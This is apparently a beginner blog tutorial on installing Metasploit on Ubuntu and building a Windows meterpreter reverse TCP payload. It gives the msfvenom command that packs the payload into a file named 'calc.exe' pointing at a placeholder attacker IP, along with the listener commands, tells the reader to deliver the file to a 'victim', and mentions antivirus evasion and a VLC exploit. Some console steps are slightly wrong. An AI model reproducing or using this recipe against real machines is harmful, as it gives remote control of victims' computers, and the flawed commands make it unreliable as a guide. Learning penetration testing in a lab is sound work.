"metasploit"

Published: Mon 07 September 2020

In content.

- "blog-posts"

Metasploit Beginner Quick Start

This article is for beginner pentesters who are struggling in getting their own Metasploit installation up and running. Also I realized some struggle when it comes to generating the payload or executing the exploit. This article will touch on the basics of working payload generation.

This article was written for Ubuntu 18.04.4 LTS VPS (Virtual Private Server) running on DigitalOcean. Writer picked 4GB RAM with 80GB disk space which costs about USD 20 per month. Following guide in this article should apply to other debian derivatives as well.

Once you are ready with your Debian/Ubuntu installation, execute following command:

  • #apt -y update && apt -y upgrade

Above step will ensure you have updated installation.

Metasploit Installation

Download Metasploit installer by running the following command:

  • #curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

Give the msfinstall file executable permission and execute the file by running following command from the directory where you have downloaded the installer file: -#./msfinstall

Once you have done above step, now you need to initialize the database that will be used by Metasploit by running following command as non-root user: -msfdb init

Metasploit Examples

In this example, we are going to create a windows meterpreter reverse tcp payload and give it to our victim.

To generate the payload, you need to run following command:

  • #msfvenom -p windows/meterpreter_reverse_tcp LHOST=<ATTACKER_IP_ADDR> LPORT=<ATTACKER_PORT> -f exe > calc.exe

Then on a separate terminal, launch msfconsole and enter following commands:

  • msf5 > use window/meterpreter_reverse_tcp
  • msf 5 > set LHOST <ATTACKER_IP_ADDR>
  • msf 5 > set LPORT <ATTACKER_PORT>
  • msf 5 > run

Aforementioned commands, when followed step-by-step will generate a payload for you in the host. Now transfer the file to your own machine and run following commands step-by-step:

  • #msfconsole
  • msf 5 >use exploit/multi/handler
  • msf 5 >set PAYLOAD windows/meterpreter_reverse_tcp - this you will follow what is set during msfvenom payload generation command
  • msf 5 >set LHOST <ATTACKER_IP_ADDR>
  • msf 5 > set LPORT <ATTACKER_PORT>
  • msf 5 >exploit

Now the meterpreter will listen for any incoming connection. Go ahead and run the file that has been generated in victim or your own computer and you should see the connection being made.

Conclusion

Metasploit is a powerful tool. You can use it to generate state-of-the-art payloads and stagers that can avoid anti-virus detection. It also has exploit session where you can use exploit for vulnerable software. For example, there is a exploit for mkv files for VLC player version 2.2.8. So you can install the vulnerable VLC player and try out the exploit yourself. Exploit generation is somewhat similar. If you get stuck, use show options and help to show what commands or options available to you.

Written with StackEdit.

social